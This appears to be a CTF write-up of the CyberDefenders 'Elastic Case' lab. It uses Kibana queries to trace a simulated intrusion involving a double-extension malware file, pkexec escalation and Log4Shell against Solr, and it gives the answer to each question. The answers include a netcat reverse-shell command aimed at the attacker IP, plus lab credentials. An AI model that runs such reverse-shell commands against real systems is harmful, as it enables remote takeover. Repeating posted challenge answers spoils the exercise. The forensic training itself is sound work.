Cyberdefenders ELASTIC CASE write up
Cyberdefenders is a big opportunity for cyber security analysts. Platform has a very different rooms for investigate for cyber crimes. One of them is the elastic case room in which it gives you a server with an Elk stack deployed.
Let’s deep dive into the ELK stack !!
We will download c71-ElasticSecurity.zip file and extract. When the virtual box is open, we double-click on the ova file that comes out of it and our machine is ready.
Zip Password: cyberdefenders.org
SHA1: 0eda6605d309486110f012bc8dc73e4652059b04
Access Kibana interface via http://127.0.0.1:5601.
username: elastic
password:elastic
#1 Who downloads the malicious file which has a double extension?
We can see malicious file alerts at Observability>Security>Overwiev field. Double extension file looks like orhan.xml.exe
Use this pattern for search the double extension file
filename *.*.*
- Answer: ahmed
#2 What is the hostname he was using?
Same field show us hostname
- Answer: DESKTOP-Q1SL9P2
#3 What is the name of the malicious file?
Also same field include a filename answer.
- Answer: Account_details.pdf.exe
#4 What is the attacker’s IP address?
- Answer: 192.168.1.10
#5 Another user with high privilege runs the same malicious file. What is the username?
The other username appeared on our previous screen.
- Answer: cybery
#6 The attacker was able to upload a DLL file of size 8704. What is the file name?
We will use file.name: 8704 filter for answer.
- Answer: mCblHDgWP.dll
#7 What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?
- Answer: rundll32.exe
#8 The previous process was able to access a registry. What is the full path of the registry?
In kibana logs index search use process.pid : 8856 then extract registry.path field from selected fields.
- Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
#9 PowerShell process with pid 8836 changed a file in the system. What was that filename?
we will use
Filter: process.name: “powershell.exe” and process.pid : 8836 filters.
- Answer: ModuleAnalysisCache
#10 PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?
Filter: process.pid: 11676 and file.extension : ps1
- Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1
#11 What is the machine’s IP address that is in the same LAN as a windows machine?
Machine Ip is 192.168.10.10
Filter: host.ip: 192.168.10.0/24 and NOT host.ip: 192.168.10.10
- Answer: 192.168.10.30
#12 The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?
Check Security>Hosts>ubuntu>Authentications
- Answer: salem
#13 After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?
Filter: hostname: “ubuntu” and process.args: “wget” and username: “salem”
#14 After The attacker runs the exploit, which spawns a new process called pkexec, what is the process’s md5 hash?
Filter: host.name: “ubuntu” and process.executable :*pkexec and event.action: “uid_change”
- Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6
#15 Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?
Filter: host.name: “ubuntu” and process.pid: 3011
bash -i
#16 What is the hostname which alert signal.rule.name: “Netcat Network Activity”?
Filter: signal.rule.name: “Netcat Network Activity”
- Answer: CentOS
#17 What is the username who ran netcat?
Filter: process.args : “nc” and event.action : exec
- Answer: solr
#18 What is the parent process name of netcat?
Filter: process.args : “nc” and event.action : exec
- Answer: java
#19 If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?
Filter: process.args : “nc” and event.action : exec
- Answer: nc -e /bin/bash 192.168.1.10 9999
#20 From the previous three questions, you may remember a famous java vulnerability. What is it?
Ez
- Answer: Log4Shell
#21 What is the entire log file path of the “solr” application?
Filter: log.file.path : *solr*
- Answer: /var/solr/logs/solr.log
#22 What is the path that is vulnerable to log4j?
Filter: log.file.path : *solr*
Answer: /admin/cores
#23 What is the GET request parameter used to deliver log4j payload?
Filter: log.file.path : *solr*
Answer: foo
#24 What is the JNDI payload that is connected to the LDAP port?
Filter: log.file.path : “/var/solr/logs/solr.log” and message: *jndi*
